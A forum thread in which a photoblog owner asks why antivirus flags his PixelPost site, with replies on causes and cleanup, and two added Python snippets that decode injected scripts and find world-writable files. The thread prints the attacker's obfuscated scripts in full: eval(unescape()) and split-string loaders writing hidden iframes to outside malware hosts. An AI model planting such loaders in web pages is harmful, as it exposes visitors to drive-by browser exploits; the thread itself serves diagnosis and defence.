Crap, what's happened to my website?

I run a photoblog using PixelPost which has been throwing up an error for the past few weeks (I've been too busy to fix it). Just something about something in a line of code or something.

I just spotted that my signature wasn't appearing on these forums so went to my website and was surprised to see Nod32 fire up with this;
1714_alert.jpg

:confused:

Has my hosting or website been compromised? :confused:

I reuploaded the index.php and index.html files from backups on my PC but I still get the error. Link is here: www.2m2l.net

EDIT: And my hosting is with HostRocket.com
 
What has happened is either your PHP script has been compromised (an XSS attack through poorly validated user input) or your hosting provider's server has been compromised. The attacker in either case has placed an iframe into your index page which will load JavaScript to exploit a vulnerability in particular browsers, hence the antivirus warning.

I can't see the code on your website - have you removed it since?

I would recommend looking at your script to ensure it does not use user input directly without sanitisation in any shell_exec or writes to files. If you are confident your script could not have been exploited, check your local machine for trojans/keyloggers then change your FTP password. Finally contact your hosting provider as it's possible their machine was root compromised or at least allowed a hacker to execute a script which searched for and modified any files with global write permissions (don't set global write permissions where possible).

HTH :)
 
Thanks Adz. Unfortunately although I've done a fair bit of webdesign I was never really into hard-core coding so a lot of that goes a bit over my head. I've searched the HR forums and there seems to have been some sort of hack into people's sites. My site seems fine now I have replaced the index files.. but I'm sure that's not the whole of what I should be doing to fix this?

My site was running pretty much a vanilla install of PixelPost so there were no forms or anything for people to submit stuff into.
 
Oh, a subdomain site I had hosted still had the index.php that was obviously put there. Doesn't look like the index that should be there! lol;

Code:
<script type='text/javascript'>

<!--

var msg=314,d=document;

eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%73%65%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%30%30%39%30%29%2b%27%61%35%38%61%64%62%38%37%63%38%5c%27%20%77%69%64%74%68%3d%34%35%33%20%68%65%69%67%68%74%3d%35%33%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );

//-->

</script>

<script>var arw="<";var kvy="i";var ipxis=" ";var edrqo="gojvg='wjcYwjob' wsdyo='v26nnHqz' difyp='rM00xE90' hkkqp='qNk3qlAN' curgk='eWmdJd7K' fckub='ItE6otnL' uolmf='oN9H7aD0' rupal='IdDlSBho' urvlh='DlEHg14y' src=";var wdqxe="ame>";var acdpt="g/traffic/ft01/";var odafj=" ";var wdy="f";var qhi="r";var sxt="a";var paoyd="ejeax='QDEV4ttL' ojoyd='3gfYCHg1' undfd='wBHmP2BK' rqqdw='6Z2HOV7Y' ofamf='rVEEpDKp' haupo='Q5ngfgTl' kyggj='ls8Keui9' cpoop='ceFyxRKi' jcuav='YcpKufbV' ";var hxf="m";var rva="e";var sfgpc="width=437 ";var xfrwt="http://reddii.or";var pqhim="height=324 ";var ekwos="style='display:none'";var vndua=xfrwt+acdpt;var riqhb="></ifr";document.write(arw+kvy+wdy+qhi+sxt+hxf+rva+ipxis+edrqo+vndua+odafj+paoyd+sfgpc+pqhim+ekwos+riqhb+wdqxe);</script>

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%35%64%63%66%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%63%6e%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%32%34%38%36%35%29%2b%27%38%38%32%33%35%66%33%66%63%5c%27%20%77%69%64%74%68%3d%35%36%35%20%68%65%69%67%68%74%3d%32%32%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

<script>var sie="<";var itk="i";var oajnc=" ";var ahoqu="dvgfd='bUopLh9o' sempc='c8t1jT6I' rouwd='wlxezHR1' mqxrp='bR7ITY92' dympm='DOoO3axJ' equbx='yWVCyv9A' hwteu='vvqvqNHg' yange='QpYYyGjH' bhpwr='U9oYMfOl' src=";var cpgue="ame>";var iavqb="g/traffic/ft01/";var ahuhe=" ";var dgf="f";var pms="r";var yno="a";var lvrtg="boevj='WGX4ekLT' tguee='EVUIyRkw' iehiv='ccjoqylu' dcruk='DKKRddjZ' rwikg='2eTxBhae' racyo='aXmb0Bka' yvbud='4vtLDvFI' eutbo='a2UeIvck' bkstl='fcp6Ug7r' ";var wur="m";var fyc="e";var nykyi="width=633 ";var qymcs="http://reddii.or";var nehnc="height=89 ";var prbwe="style='display:none'";var yywgy=qymcs+iavqb;var lelmv="></ifr";document.write(sie+itk+dgf+pms+yno+wur+fyc+oajnc+ahoqu+yywgy+ahuhe+lvrtg+nykyi+nehnc+prbwe+lelmv+cpgue);</script>

EDIT: http://www.coderforums.com/showthread.php?t=22926

Sounds pretty crap! I've wanted to move hosts for a long time but the problem is that my dad pays and has done for years so if I bring it up he's gonna ask me to start paying considering I use it the most lol :D
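The injected scripts posted above use two obfuscation forms: `eval(unescape('%xx...'))`, and an iframe tag split across string variables that `document.write()` joins back together. The following is an added example, not part of the original post: it recovers the hidden iframe from both forms statically, without executing anything. The function names and the `.invalid` hosts in the sample page are constructed for illustration.

```python
import re
from urllib.parse import unquote

SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
EVAL_UNESCAPE = re.compile(r"""eval\(\s*unescape\s*\(\s*(['"])((?:%[0-9a-fA-F]{2})+)\1""")
VAR_ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*("[^"]*"|\w+(?:\s*\+\s*\w+)*)\s*;')
DOC_WRITE = re.compile(r"document\.write\(\s*(\w+(?:\s*\+\s*\w+)*)\s*\)")
IFRAME = re.compile(r"<iframe\b[^>]*?\bsrc=\\?['\"]?([^\s'\"\\>]+)[^>]*>", re.I)
HIDDEN = re.compile(r"display:\s*none", re.I)


def join_vars(expr, env):
    """Evaluate a+b+c where every operand is a known string variable."""
    return "".join(env.get(part.strip(), "") for part in expr.split("+"))


def decode_layers(html):
    """Return the markup each injected script would write, without executing it."""
    layers = []
    for script in SCRIPT.findall(html):
        # Form 1: eval(unescape('%xx...')); JS unescape() maps %xx to Latin-1.
        for m in EVAL_UNESCAPE.finditer(script):
            layers.append(unquote(m.group(2), encoding="latin-1"))
        # Form 2: tag split across string variables, joined in document.write().
        env = {}
        for name, rhs in VAR_ASSIGN.findall(script):
            env[name] = rhs[1:-1] if rhs.startswith('"') else join_vars(rhs, env)
        layers += [join_vars(e, env) for e in DOC_WRITE.findall(script)]
    return [layer for layer in layers if layer]


def hidden_iframes(html):
    """List (src, is_hidden) for iframes in the page and in every decoded layer."""
    return [(m.group(1), bool(HIDDEN.search(m.group(0))))
            for layer in [html] + decode_layers(html)
            for m in IFRAME.finditer(layer)]


def constructed_sample():
    """Constructed page with both forms; hosts are reserved .invalid names."""
    js = ("document.write('<iframe src=\\'http://a.example.invalid/t.php?\\' "
          "style=\\'display: none\\'></iframe>')")
    enc = "".join("%%%02x" % b for b in js.encode("ascii"))
    split = ('<script>var a="<";var b="ifr";var c="ame ";var u="http://b.example.inval";'
             'var v="id/ft/";var s=u+v;var z="src=";'
             'var h=" style=\'display:none\'></iframe>";document.write(a+b+c+z+s+h);</script>')
    return "<html><p>photo</p><script>eval(unescape('" + enc + "'));</script>" + split + "</html>"


if __name__ == "__main__":
    for src, hidden in hidden_iframes(constructed_sample()):
        print("hidden" if hidden else "visible", src)
```

Running `hidden_iframes()` over every `.php`, `.html` and `.js` file restored from backup or left on the server shows which files still carry an injected frame, including ones like the subdomain index that were not replaced.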
 
Is the Pixelpost software up to date with all security patches? There might have been something insecure there.

Otherwise you probably want to speak to your hosting provider.

Is anything on your site currently chmodded with global write permissions?
 
Hmn I was running an older version of PixelPost so that was possibly a problem.

I'll have to look into chmod.. I know I had to set up some stuff for PP to work properly.
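For the global write permission question raised in the thread, the following added example (not from any poster) audits a local copy of a web root for files and directories that any account on a shared host could modify, and reports the mode with the world-write bit cleared. It assumes a POSIX filesystem; the function names are constructed for illustration.

```python
import os
import stat


def world_writable(root):
    """Yield (path, mode, suggested_mode) for entries writable by 'other'."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)          # lstat: never follow links out of root
            if stat.S_ISLNK(st.st_mode):
                continue                 # a symlink's own mode bits are not meaningful
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:      # the "global write" bit (e.g. 666, 777)
                yield path, mode, mode & ~stat.S_IWOTH


def report(root):
    """Sorted (relative path, current mode, suggested mode) tuples, modes in octal."""
    return sorted((os.path.relpath(p, root), oct(m), oct(s))
                  for p, m, s in world_writable(root))


if __name__ == "__main__":
    import sys
    for rel, mode, suggested in report(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {mode} -> {suggested}")
```

Directories an application genuinely needs to write to (upload or thumbnail folders, for example) usually work with owner or group write once the web server runs as the right user, so each entry this reports is worth checking against the application's install notes rather than leaving at 777.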
 